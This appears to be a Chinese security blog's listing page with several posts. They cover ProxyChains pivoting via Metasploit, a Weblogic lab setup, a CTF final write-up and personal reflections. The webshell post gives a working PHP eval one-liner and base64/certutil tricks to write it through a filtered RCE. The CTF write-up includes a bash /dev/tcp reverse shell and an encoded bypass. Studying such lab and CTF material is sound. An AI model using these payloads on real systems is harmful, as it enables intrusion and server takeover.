搜索到
33
篇与
的结果
-
-
-
-
内网渗透中使用ProxyChains进行代理 概述在内网渗透当中,往往需要将内网的流量代理出来很多时候,我们常常用Frp等内网穿透工具将内网的相关流量穿透出来,但在有多个网段的情况下很容易就会搞混于是在Linux当中,有款命令行代理工具——ProxyChains非常好用,我个人比较喜欢将它用作内网跨网段渗透。有些师傅不知道,这里就记录一下工具介绍ProxyChains是Linux和其他Unix下的代理工具。它可以使任何程序通过代理上网,允许TCP和DNS通过代理隧道,支持HTTP/SOCKS4/SOCKS5类型的代理服务器,并且可配置多个代理。ProxyChains通过一个用户定义的代理列表强制连接指定的应用程序,直接断开接收方和发送方的连接。ProxyChains 是一个强制应用的 TCP 连接通过代理的工具,支持 Tor/HTTP/Socks 代理。需要注意的是,ProxyChains 只会将当前应用的 TCP 连接转发至代理,而非全局代理。工具的安装在新版本KaliLinux下(懒得测试老版本了)自带该工具,不需要进行安装操作如果没有的话,也可以像这样快捷安装:Ubuntu可以直接使用apt安装,如下:sudo apt-get install proxychains其他系统,可以选择编译安装,如下:git clone https://github.com/rofl0r/proxychains-ng cd proxychains-ng ./configure sudo make && make install工具的使用我们首先来看下,简单的模拟情景思维导图如下:攻击者已经通过MSF控制了外部Web服务器,目的是想要对内网OA服务器进行内网渗透第一步、使用MSF生成socks代理攻击者使用的MSF开启代理:msfconsole use auxiliary/server/socks4a exploit默认就会在1080端口开放socks4代理第二步、更改ProxyChains配置文件vi /etc/proxychains.conf socks4 192.168.0.66 1080 //新增一行第三步、利用外层Web服务器的meterpreter,添加静态路由sessions 1 //根据自己的实际情况进入session run autoroute -s 10.10.1.0/24 //绑定内网网段 run autoroute -p //查看是否绑定成功第四步、使用代理进行攻击这里以Nmap举例:proxychains3 nmap -sT -Pn 10.10.1.12 -p 80 //扫描10.10.1.12的80端口使用火狐打开内网OA页面:proxychains3 firefox http://10.10.1.12使用Python脚本对内网OA进行攻击:proxychains3 python Exp.py -u http://10.10.1.12 proxychains3 python3 Exp.py -u http://10.10.1.12举个例子,这里要看具体Python脚本的参数总结这就是一个小小的工具使用技巧分享文章希望对各位师傅的内网渗透有所帮助
-
避坑小记:Weblogic漏洞复现环境搭建 0# 什么是Weblogic?WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。根据我的个人经验,国内金融产业(银行)、政府等单位都比较喜欢Weblogic,应用还是相对比较广泛的1# 关于Weblogic搭建在平常的信息安全相关工作、学习过程中,Weblogic的相关漏洞经常会碰到。而Weblogic环境搭建过程很繁琐,并且平常想要进行代码调试、漏洞复现的时候,经常会有搭建各种Weblogic版本和各种JDK版本的排列组合的需求,导致安全研究人员苦不堪言。我早些年也被这个问题搞得焦头烂额,当时我一气之下封装了好几个docker才解决问题,但花了不少精力和世界,有没有一个更优雅的方法解决这个问题呢?最近刚好有两个Weblogic漏洞比较感兴趣,想上手分析一下。正好又看到了奇安信A-Team的Weblogic快速构建项目,这里就上手来试一下,并随手记录一下整个搭建过程。2# 准备工作2.1# 准备工具VMware虚拟机(其他虚拟机也行)CentOS 7镜像(这个快速构建项目只能用CentOS,刚开始我用Ubuntu跑不起来,算是踩坑了)WeblogicEnvironment(奇安信A-Team的Weblogic快速构建项目)对应版本的JDK安装包(看你需求)对应版本的Weblogic安装包(看你需求)2.2# 资源下载方式CentOS镜像下载地址: http://mirrors.aliyun.com/centos/7.9.2009/isos/x86_64/ 下载 CentOS-7-x86_64-DVD-2009.iso 即可,也可以用 CentOS-7-x86_64-DVD-2009.torrent 种子进行下载WeblogicEnvironment: https://github.com/QAX-A-Team/WeblogicEnvironment 直接下载代码即可JDK安装包下载地址: https://www.oracle.com/java/technologies/downloads/archive/ 选择要安装的版本,比如我想要安装JDK7,直接点击对应链接:选择 Linux x64 并下载即可Weblogic安装包下载地址: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html 选择要安装的版本,比如我想要安装 Oracle WebLogic Server 10.3.6,选择 Generic Installer 并下载即可3# 开始搭建Weblogic漏洞复现环境准备工作都完成了,那就开始搭建吧~3.1# 安装CentOS到虚拟机这一步不需要我教你了吧,有问题百度如果需要把CentOS系统语言改为中文,可以参考这篇文章: https://www.cnblogs.com/-zzf/p/16137234.html 换源的话,如果觉得原始源太慢可以选择换源安装VM-Tools,在命令行输入以下命令:sudo yum install -y open-vm-tools sudo yum install -y open-vm-tools-desktop3.2# CentOS安装Docker最好是切换到 root 账户(我怕权限问题)su root在终端执行以下命令:yum install -y docker显示Docker安装完毕,验证一下是否安装正常即可:docker --version或者是这样:yum list installed | grep docker如果想每次在服务器启动后都自动启动 Docker 的话,可以使用以下命令开启:systemctl enable docker3.2# 配置WeblogicEnvironment将刚才准备的WeblogicEnvironment压缩包复制到CentOS并解压:根据项目描述,打开解压后的文件夹,创建两个新文件夹,名字分别是 jdks 和 weblogics然后将准备好的JDK安装包和Weblogic安装包分别放到 jdks 和 weblogics 这两个文件夹里面3.3# 运行WeblogicEnvironment这个项目提供了一键构建Docker镜像的sh脚本,但我们需要修改一下项目文档中也给出了示例:{card-describe title="项目示例代码"}以Weblogic12.1.3配JDK 7u21为例,构建镜像命令如下:docker build --build-arg JDK_PKG=jdk-7u21-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.1.3.0.0_wls.jar -t weblogic12013jdk7u21 .镜像构建完成后,执行以下命令运行:docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic12013jdk7u21 weblogic12013jdk7u21{/card-describe}同样这两行代码也包含在项目的sh脚本中了,我们修改一下sh脚本文件保存即可:接下来给文件夹赋予执行权限:cd /home/demo/WeblogicEnvironment-master //根据项目的位置自行切换 chmod -R 777 ../WeblogicEnvironment-master然后看一下执行权限给了没:cd /home/demo/WeblogicEnvironment-master //根据项目的位置自行切换 ls -l接下来执行脚本即可:./run_weblogic1036jdk7u21.sh //刚才修改的sh脚本名字3.4# 解决报错问题这个时候会报错:Error: Failed to download metadata for repo 'appstream': Cannot prepare internal mirrorlist: No URLs in mirrorlist{card-describe title="报错解决过程"}首先,进入到 yum 的 repos 目录cd /etc/yum.repos.d/其次,修改相关文件内容:sed -i 's/mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-* sed -i 's|#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-*然后,安装 wget:yum install wget –y //如果已经安装了wget就不需要这一步接着,更新 yum 源为阿里源:wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo最后,生成缓存更新(第一次更新,速度稍微有点慢,耐心等待两分钟左右):yum clean all yum makecache验证安装 vim 看有无报错:yum install -y vim最重要的一步,修改项目的 Dockerfile 文件!修改开头内容为:FROM centos FROM centos:centos7注释掉以下内容为:# 解决libnsl包丢失的问题 #RUN yum -y install libnsl{/card-describe}3.5# 成功搭建Weblogic漏洞复现环境再次运行sh脚本即可成功将Docker环境跑起来:访问 虚拟机IP:7001/console/login/LoginForm.jsp 能登录到 Weblogic Server 管理控制台,用户名密码如下:默认用户名:weblogic 默认密码:qaxateam014# 总结搭建一路上还是遇到了不少坑,也卡了挺久的,有时候确实让人很烦躁但技术的学习就是这样,很多时候都是在发现问题、解决问题,只有认真、耐心的去面对并解决问题,才能有相应的成长和收获!同时也希望这篇文章能给各位师傅带来帮助~
-
Web系统的RCE漏洞的Getshell姿势 情景描述今天早上在研究一个Web系统的0Day,虽然是个任意命令执行漏洞,但是这个RCE有些局限,就想通过RCE写个WebShell提提权再看看目标系统:Microsoft Windows Server 2019 Standard动态脚本:PHP 5.6GetShell姿势通常我们写入文件,通常都会使用CMD的echo命令echo 文件内容 > "文件名"假如我们要写php一句话的时候,比如:<?php eval($_POST["aabyss"]); ?>这时候有同学就想到这样不就好了:echo <?php eval($_POST["aabyss"]);?> > "webshell.php"但实际上这样是不行的,因为以下特殊符号是无法直接放入echo语句(执行会提示语法错误或者无法写入这些符号):& | > < +所以通常我们会把特殊符号通过^来进行转义,比如这样:echo ^<?php eval($_POST["aabyss"]);?^> > "webshell.php"通常就能写入了难点来了但是我早上尝试的那个0day,语句没办法通过^进行转义,或者写入的流量被WAF拦截,怎么办呢?首先,我想到了通过""双引号进行包含进行写入,比如:echo echo "<?php eval($_POST["aabyss"]);?>" > "webshell.php"文件内容如下:"<?php eval($_POST["aabyss"]);?>"这样虽然能写入& | > < +这些特殊符号,但是代码最外层带了"",实测php代码是无法执行的于是我又想到了Base64编码进行写入,首先对一句话内容进行base编码:于是得到编码后的Base64字符串,如下:PD9waHAgZXZhbCgkX1BPU1RbImFhYnlzcyJdKTsgID8+但是通过上文,我们发现+也是不能写入的,怎么办呢?这时候插入在外部插入一些数字就能简单解决啦:这时候就得到一份做好的Base64字符串:MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy接下来通过echo将Base64字符串写入TXT文件即可:echo MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy > "base64.txt"接下来通过命令进行解密:certutil -f -decode "base64.txt" "webshell.txt"然后将webshell.txt复制为php文件即可大功告成:copy webshell.txt webshell.php其他一些tips对于Linux系统,可以采用系统命令直接解密Base64来写入:echo 'MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy' | base64 -d > webshell.php查看当前目录:cd解密Base64文件到上层目录:certutil -f -decode "base64.txt" "../webshell.txt"将命令输入内容写入文件查看:命令 >> out.txt
-
2022,我的年终总结 2022年终总结时间总是过得飞快,转眼间,就来到2022最后一天了要不是阳了快好了,我还就真的错过了这一天在2022年这一年当中,发生了许多事,也经历了许多,有些唏嘘:参加了浙江省HW行动(红队)和国家HW行动(蓝队),获第一名得到奖金参加5场大大小小的网络安全赛事,总体一般,还待努力2022年中开始运营自己的推特(@AabyssZG),发表自己对技术的一些看法,目前粉丝大约千余人维护好团队的相关网站,建立了团队内部漏洞库(wiki.aabyss.cn),更新了团队的渗透导航(dh.aabyss.cn)比赛中对于CTF相关知识的运用更加得心应手(诸如反序列化)建立并维护好团队的公众号,目前粉丝已达5000余人在内网渗透和免杀这块的知识得到了很大的深入应用和锻炼在多个漏洞平台提交了中高危漏洞年末建立了自己的个人博客(blog.zgsec.cn),准备开始沉淀自己对于2023年的期望{x} 能拥有自己的一个原创高危漏洞证书{x} 在学习过程中,编写相关的开源工具方便自己未来的工作和生活{ } 在Java安全领域有所建树,继续深入学习Java代码审计{x} 在CTF比赛方面继续投入精力来取得成绩{x} 寒假期间,挖一挖Edu教育行业的漏洞(目前我们团队排在第5名){x} 能参加几场国内线下的安全论坛/会议(之前一直因为疫情无法到场){x} 交接好工作室,培养好新一届的学弟学妹{x} 广开视野,广交朋友
-
一语点醒梦中人 世界不只有眼前的苟且,还有诗与远方我一直觉得,万事万物总是在变化,我们的人生也一样在人生的无数岔路口,可能有着迷茫、无助、悔恨甚至愤怒,但不管怎么也好,路仍在脚下,我还是要继续走好自己的人生这篇文章是写给我自己的,希望未来,我在岔路口迷失自我的时候,能想到这篇文章相由心生,境随心转我一直相信一句话:“相由心生,境随心转”在我理解中:“相”可以指物品的表象,也可以指面对的事情“境”可以指周遭的环境,也可指自己的心境。一件事、一个物,它的“相”取决于你怎么看待它;周遭的环境、你的心境,他的“境”更取决于你自己在人生的每个阶段,都要合理、科学的看待事物和问题,更要理性的对待环境:何为“相由心生”?当你以不同态度、不同方向去看待事、物,你所看的“相”不尽相同何为“境随心转”?有时候无法改变环境,那就改变自己,另辟蹊径创造更好的环境一些平常生活中看到的词条当你为错过太阳而哭泣的时候,你也要再错过群星了。如果我们的后代害怕枪声和爆炸声,男孩子缺乏阳刚之气,而女孩子肤浅无知,就是最大的耻辱和悲哀。 ——俄罗斯联邦武装力量绍伊古大将离你最近的道路,路程也最遥远;就像通过最复杂的练习,人们才能收获最简单的曲调。有一个夜晚我烧毁了所有的记忆,从此我的梦就透明了;有一个早晨我扔掉了所有的昨天,从此我的脚步就轻盈了。弱小和无知不是生存的障碍,傲慢才是! ——《三体》人生是一座桥梁,它的伟大绝不来自它的目的。它连接起正午、黄昏和黎明,让自发的意义在这样的过程中不断拓展。永远不要因为你不懂,就妄自猜测;永远不要因为别人不同于你,而随便批判。越是这样,越暴露出你的无知。看恩,看善,看远,看宽,看淡。世界不坏,人心在坏;社会不乱,人心在乱。我们很多时候是不是觉得我们抓的牌实在是太差了呀,但是再差的牌,我们都应该打下去。我们登上并非我们所选择的舞台,我们决定不了我们的出身、决定不了我们的智商、更决定不了我们这一生的贵人相助,很多时候我们会羡慕别人的剧本,但是,没有谁的剧本值得羡慕,你只能把你自己的剧本给演好。如果在你的一生中真的遭遇了这些挫折,那对不起,这就是你的剧本,你有两种选择:一种选择是弃演,一种选择就是把既定的剧本给演好。所以希望大家能演好自己的剧本。 ——罗翔教授天冷,心不冷;天寒,志不寒;因为尊严和良心都还在。生命发光发热,不存在成功与失败。生活只是,一个过程、一份经历、一种经过,只是时间的长短,不同的方式与层次的体会。不在沉默中爆发,就在沉默中死亡。你们记住,当一个人去追求生活的必需品的时候,他往往是勤奋和勇敢的;当一个人去追求生活的消费品的时候,这个时候他往往变得懒惰和温和;当一个人去追求生活的奢侈品的时候,这个人就变得软弱了。一个人、一个家庭、一个单位、一个民族、一个国家,奢侈品越多,就越愿意用剩余财富,而不是以他自己的生命为代价,去守卫其财富,记住这一点。 ——郑强教授埋怨与怀恨是善良的阻碍,让人无法慈悲,无法感恩,无法付出,无法接受。长期的埋怨与仇恨,会伤害身体、破坏人生的幸福。就算彼此有恩怨,也应该彼此尊重,这是基本的原则与道德。拥有是一种承担,放下是一种解脱。迷途知返者是勇者,迷心知返者是智者。尊严只在剑锋之上,真理只在大炮射程之内。 ——艾跃进教授水落石出、日久见人心,不要这么快下判断、下定论,给时间与结果一点空间、一个机会。没有相逢恨晚,因为一切是缘,缘生缘起,缘起缘灭。愿中国青年都摆脱冷气,只是向上走,不必听自暴自弃者流的话。能做事的做事,能发声的发声。有一分热,发一分光,就令萤火一般,也可以在黑暗里发一点光,不必等候炬火。此后如竟没有炬火:我便是唯一的光。 ——鲁迅先生
-
2022安恒杯决赛思路分享 比赛概述难以置信,我们是第一名!!!感谢同一队的@Mstir师傅和我的密切合作哈哈 安恒杯初赛是CTF,我博客前面两篇文章写了一部分解题思路,后面看看要不要再把一些解题思路放上来(主要是懒哈哈,懒得码字)决赛的话,就不是CTF的赛制了,而是综合渗透赛制,这个有点像AWD但又不像本来我和 @Mstir 师傅也只是想认真比一下的,但没想到拿了第一,真的意想不到有些师傅想要让我分享一下这次比赛,那我就在这里简单的分享一下吧何为综合渗透赛制?综合渗透赛制,又称靶场综合渗透,此模式涉及多个前沿热门应用、同时涉及了多层网络,模拟真实企业生产环境,比如上线一套分布在不同网络区域的多台漏洞靶机,参赛队伍通过内网渗透获取靶机相应权限,从而读取相应的Flag(旗标文件)。涉及的知识点有内网安全、反向代理、内网穿透、服务器提权、中间件安全、数据库安全等。简单来说,就是我们作为攻击方,通过对模拟真实环境的靶机进行渗透来获取关键Flag1# 准备阶段前期:摄像头、录屏工具(EV录屏、Bandicam)因为比赛的时候,我们学校放假了,因为本次比赛有非常强的防作弊措施,比赛全程都要开启并接入监控摄像头,比赛全程所有选手的电脑必须录屏并提交,所以这两个必须要准备比赛期间:一台公网服务器:用来反弹Shell和Frp转发流量7kbScan:用于扫描Web敏感路径的BurpSuite:著名的抓包工具,爆破Web的密码要用AntSword(蚁剑):用于连接WebShell和访问数据库以及提权SolrVulScan1.0-win64.jar:本次比赛出现CVE-2019-17558这个Apache Solr的漏洞,所以需要利用工具Solr_CVE-2019-17558.py:同上,Python的漏洞利用脚本Fscan:内网扫描神器,相信很多师傅都用过Frp:用于内网渗透的时候将内网流量代理出来Proxifier:用于配合Frp,给本机系统进行全局代理Navicat(可选):数据库可视化连接工具,配合Frp连接内网数据库Ladon拉冬:K8师傅开发的内网渗透、提权必备神器DayBreak破晓平台:斗象科技开发的轻量级C2平台项目,我拿到了内测权限,用来上线Linux,可以用CobaltStrike替代能想到的工具目前就这些了,如果还有的话再补充2# 整体思维导图3# 比赛过程3.1# 外网打点阶段-phpok首先给了一个外网地址:162.14.*.*(扫描后,发现开了两个端口:80和8983端口)80端口,访问后是一个网站:显示使用phpok这个源码搭建的:直接上手7kbscan,扫描路径:扫出了一个robots.txt和admin.phprobots.txt里面带了一个flag14,admin.php是后台地址用BurpSuite爆破后台账号密码,注意这里需要识别验证码进行爆破,相关的姿势去百度有很多文章,这里就不赘述了爆破出后台账号密码:admin/admin123吐槽:估计是怕BurpSuite带验证码爆破有些队伍不会,提示Hint1直接给了账号密码,我爆破半天。。 登录后台后,百度可以找到phpok存在后台任意文件上传 (CVE-2018-12491)漏洞,直接跟着文章复现漏洞即可: https://blog.csdn.net/weixin_42675091/article/details/126673611 至此,我们拿到了WebShell,用AntSword连接即可:找到数据库配置文件,连上本地数据库:数据库地址:127.0.0.1数据库账号:root数据库密码:abc123...数据库名:phpok4simple直接可以通过蚁剑连上数据库,但是翻了翻没flag,估计在其他地方然后直接通过WebShell到/home/目录下,就找到了flag1:3.2# 外网打点阶段-Apache Solr转头来看对外开放的Solr服务:直接Python脚本一把梭哈哈,也能拿到falg13.3# 上线机器直接在Web目录下上传二进制文件,命令直接执行即可上线:在DayBreak破晓平台即可看到机器上线了:可以很清楚的看到,上线的机器内网地址为172.16.238.20同样,可以直接通过WebShell执行反弹shell指令,但是直接执行好像不行:bash -i >& /dev/tcp/8.***.**.**/25565 0>&1这时候,就需要对命令进行编码即可绕过进行反弹shell:bash -c '{echo,base64编码后的字符串}|{base64,-d}|{bash,-i}'3.4# 内网扫描直接丢个Ladon拉冬或者Fscan扫内网就行了这时候提示Hint2来了,直接给内网C段:172.16.238.0/24(话说用WebShell看一下地址不就好了吗,这还需要提示???)我这边同时使用Fscan和DayBreak破晓平台同时开始内网扫描:上传fscan_amd64,使用以下命令:/var/www/html/fscan_amd64 -h 172.16.238.0/24 > 222.txt将扫描结果直接导入222.txt结果如下:start ping (icmp) Target 172.16.238.20 is alive (icmp) Target 172.16.238.50 is alive (icmp) Target 172.16.238.10 is alive (icmp) Target 172.16.238.1 is alive (icmp) Target 172.16.238.30 is alive (icmp) Target 172.16.238.40 is alive [*] Icmp alive hosts len is: 6 172.16.238.30:8080 open 172.16.238.20:80 open 172.16.238.40:22 open 172.16.238.1:22 open 172.16.238.30:8009 open 172.16.238.50:445 open 172.16.238.50:139 open 172.16.238.1:80 open 172.16.238.40:3306 open 172.16.238.1:8983 open 172.16.238.10:8983 open [*] alive ports len is: 11 start vulscan [*] NetBios: 172.16.238.50 56b9f476dcc9 Windows 6.1 [*] 172.16.238.50 (Windows 6.1) [*] WebTitle: http://172.16.238.10:8983 code:302 len:0 title:None 跳转url: http://172.16.238.10:8983/solr/ [*] WebTitle: http://172.16.238.30:8080 code:200 len:11230 title:Apache Tomcat/8.0.43 [*] WebTitle: http://172.16.238.10:8983/solr/ code:200 len:14634 title:Solr Admin [*] WebTitle: http://172.16.238.20 code:200 len:14255 title:闻道集团 - 网站建设|企业网站建设|PHPOK网站建设|PHPOK企业网站建设 [*] WebTitle: http://172.16.238.1 code:200 len:14213 title:闻道集团 - 网站建设|企业网站建设|PHPOK网站建设|PHPOK企业网站建设 [*] WebTitle: http://172.16.238.1:8983 code:302 len:0 title:None 跳转url: http://172.16.238.1:8983/solr/ [*] WebTitle: http://172.16.238.1:8983/solr/ code:200 len:14634 title:Solr Admin [+] http://172.16.238.30:8009 poc-yaml-iis-put-getshell [+] http://172.16.238.30:8080 poc-yaml-tomcat-cve-2017-12615-rce [+] http://172.16.238.1:8983 poc-yaml-solr-velocity-template-rce [+] http://172.16.238.10:8983 poc-yaml-solr-velocity-template-rce //内置的ssh没爆破成功,这部分就删掉了 已完成 11/11 [*] 扫描结束,耗时: 6m40.996181292sDayBreak破晓平台扫描结果如下:没问题,两边都扫描出这些端口和内容,应该算是没有遗漏了扫出172.16.238.40这台机器开放了3306端口(MySQL数据库),加上我们之前拿到WebShell之后可以看到数据库连接的账号密码,就尝试连接发现flag5:3.5# Frp内网流量带出测试了以下,内网172.16.238.0/24是不出网的,必须要用Frp将流量带出来下载Frp: fatedier/frp 很简单,frpc是客户端,frps是服务端配置frpc.ini:# frpc.ini [common] server_addr = 自己公网服务器地址 server_port = 7000 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000 plugin = socks5 //这一句必须要加,不然代理连不上客户端通过WebShell上传,frps上传到自己的公网服务器上,配置frps.ini:# frps.ini [common] bind_port = 7000接下来要在自己的公网服务器上开6000和7000这两个端口,并执行命令进行监听:./frps -c ./frps.ini再在上线的那台机器上执行命令:/var/www/html/frp/frpc -c ./frpc.ini这样就可以成功将内网流量通过公网服务器的6000端口代理出来了,接下来使用Proxifier配合Frp对本地系统进行全局代理:3.6# 内网渗透既然上面发现172.16.238.1和172.16.238.10存在Solr漏洞,直接用SolrVulScan1.0-win64.jar打过去:也能拿到一个flag,这里就不放出来了同时,172.16.238.30的8080端口有Tomcat服务也存在漏洞,内网流量代理出来后就很方便了,直接本机打就行了:同样,读取/home/flag即可拿到flag4# 主办方提示汇总Hint1:CVE-2019-17558 find提权 admin/admin123 1. SUID提权 2. oklite的robots.txt 别忘了,然后试试 admin/admin123 登录。Hint2:1. 一层内网地址:172.16.238.0/24 2. 多扫扫,内网机器的洞很好搞的。Hint3:getshell后尽量用frp或者nps,尽量不要用 reGeorg 之类的正向代理工具,Apache可经不起你这样跑:)HInt4:注意数据安全,数据库里可能也会有flag,别光GetShell,翻下数据库。Hint5:172.16.238.40,MYSQL,用oklite的config.php里的密码去连,同学们渗透要做好信息收集。Hint6:冰蝎不行可以用蚁剑。 MYSQL UDF,还有flag。总结共8个flag,我们总共找到6个flag最后时间不够了,不然172.16.238.40的MySQL进行UDF提权,估计还能拿到一个flagMySQL提权可以看我这篇文章: MySQL不出网文件落地上线姿势队伍里面合作很重要,感谢 @Mstir 师傅和我的密切配合这种比赛需要自备一台公网服务器,不然后期的内网渗透寸步难行自己渗透的速度还是不够,如果再快点,能把全部flag都找到,还要多加练习信息搜集很重要,特别是内网的信息,40那台机器的数据库我也差点忽略了哈哈感谢安恒科技和各个主办单位,给我们这次机会展示自己,没想到真的拿了第一名
